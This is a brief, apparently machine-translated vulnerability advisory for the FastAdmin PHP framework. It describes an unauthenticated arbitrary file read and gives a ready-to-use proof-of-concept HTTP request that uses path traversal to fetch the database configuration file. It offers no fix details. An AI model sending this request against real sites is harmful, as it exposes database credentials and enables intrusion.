0x00 Предисловие

FastAdmin — это серверная среда с открытым исходным кодом, основанная на PHP + Bootstrap и использующая удобный для бизнеса протокол с открытым исходным кодом Apache2. FastAdmin — это серверная среда с открытым исходным кодом, тщательно созданная для разработчиков. Она эффективна и может использоваться для бесплатного коммерческого использования без отдельной авторизации.

Генерация CRUD в фоновом режиме FastAdmin одним щелчком мыши может автоматически генерировать контроллеры, модели, представления, JS, языковые пакеты, меню, корзины и т. д. на основе таблиц данных одним щелчком мыши, что может эффективно повысить эффективность разработки разработчиков.

FastAdmin стремится служить разработчикам и стремится сэкономить время разработчиков, чтобы у каждого было больше времени для чтения, занятий спортом, открытия исходного кода, инвестиций, путешествий, помощи друзьям и проведения времени с семьей.

0x01 Описание уязвимости

В интерфейсе /index/ajax/lang внутренней среды разработки FastAdmin существует уязвимость чтения произвольных файлов. Неаутентифицированный злоумышленник может использовать эту уязвимость для чтения важных системных файлов (таких как файлы конфигурации базы данных, файлы конфигурации системы).

0x02 номер CVE

никто

0x03 затронутая версия

никто

0x04 Подробности об уязвимости

POC：

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

ссылка на ссылку 0x05

https://www.fastadmin.net/